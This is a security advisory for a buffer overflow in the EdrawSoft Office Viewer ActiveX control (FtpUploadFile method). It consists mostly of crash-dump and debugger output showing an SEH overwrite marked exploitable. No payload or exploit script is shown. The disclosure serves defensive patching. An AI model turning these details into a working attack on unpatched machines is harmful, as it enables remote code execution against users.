EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC

The ActiveX suffers from a buffer overflow vulnerability when parsing large amount of bytes to the FtpUploadFile member in FtpUploadFile() function, resulting memory corruption overwriting severeal registers including the SEH. An attacker can gain access to the system of the affected node and execute arbitrary code.

--------------------------------------------------------------

CompanyName EdrawSoft
FileDescription Edraw Office Viewer Component
FileVersion 5.6.578.1

OriginalFileName officeviewer.ocx
ProductName OfficeViewerOCX
ProductVersion 5.6.5781

Report for Clsid: {F6FE8878-54D2-4333-B9F0-FC543B1BE1ED}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

Exception Code: ACCESS_VIOLATION
Disasm: 220324CC MOV [EDI],AX (officeviewermme.ocx)

Seh Chain:
--------------------------------------------------
1 410041

Called From Returns To
--------------------------------------------------
officeviewermme.220324CC officeviewermme.22026402

Registers:
--------------------------------------------------
EIP 220324CC
EAX 00000041
EBX 00001015
ECX 000002A0
EDX 001B2E4C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 01870000
ESI 0186E518 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0186C490 -> 0186C530
ESP 0186C488 -> 00000000

Block Disassembly:
--------------------------------------------------
220324BD MOV EDI,[EBP+8]
220324C0 MOV ESI,EDI
220324C2 TEST ECX,ECX
220324C4 JE SHORT 220324F7
220324C6 MOV EDX,[EBP+C]
220324C9 MOVZX EAX,WORD PTR [EDX]
220324CC MOV [EDI],AX <--- CRASH 220324CF INC EDI 220324D0 INC EDI 220324D1 INC EDX 220324D2 INC EDX 220324D3 TEST AX,AX 220324D6 JE SHORT 220324DB 220324D8 DEC ECX 220324D9 JNZ SHORT 220324C9 ArgDump: -------------------------------------------------- EBP+8 0186E518 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 001B1364 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 00001014
EBP+20 00000000
EBP+24 000007FC
EBP+28 01761EC0 -> Uni: D5")"

Stack Dump:
--------------------------------------------------
186C488 00 00 00 00 64 13 1B 00 30 C5 86 01 02 64 02 22 [....d........d..]
186C498 18 E5 86 01 64 13 1B 00 14 10 00 00 00 00 00 00 [....d...........]
186C4A8 FC 07 00 00 C0 1E 76 01 18 CD 86 01 18 D5 86 01 [......v.........]
186C4B8 18 ED 86 01 64 13 1B 00 10 CD 86 01 18 E5 86 01 [....d...........]
186C4C8 14 10 00 00 8E 33 1B 00 14 10 00 00 00 00 00 00 [................]

--------------------------------------------------------------

(6c9c.6c70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=00001015 ecx=000002a0 edx=001b2edc esi=0186e518 edi=01870000
eip=220324cc esp=0186c488 ebp=0186c490 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx -
officeviewermme!DllRegisterServer+0x23bbe:
220324cc 668907 mov word ptr [edi],ax ds:0023:01870000=????
0:004> !exchain
0186fa84: 00410041
Invalid exception stack at 00410041
0:004> d esi
0186e518 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e528 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e538 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e548 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e558 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:004> d edx
001b2edc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2eec 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2efc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f0c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f1c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f2c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f3c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f4c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:004> d esp+3000
0186f488 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f498 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4e8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4f8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:004> !load msec; !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at officeviewermme!DllRegisterServer+0x0000000000023bbe (Hash=0x55146322.0x550a2c22)

User mode write access violations that are not near NULL are exploitable.

Advisory ID: ZSL-2012-5069
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php

Comment are closed.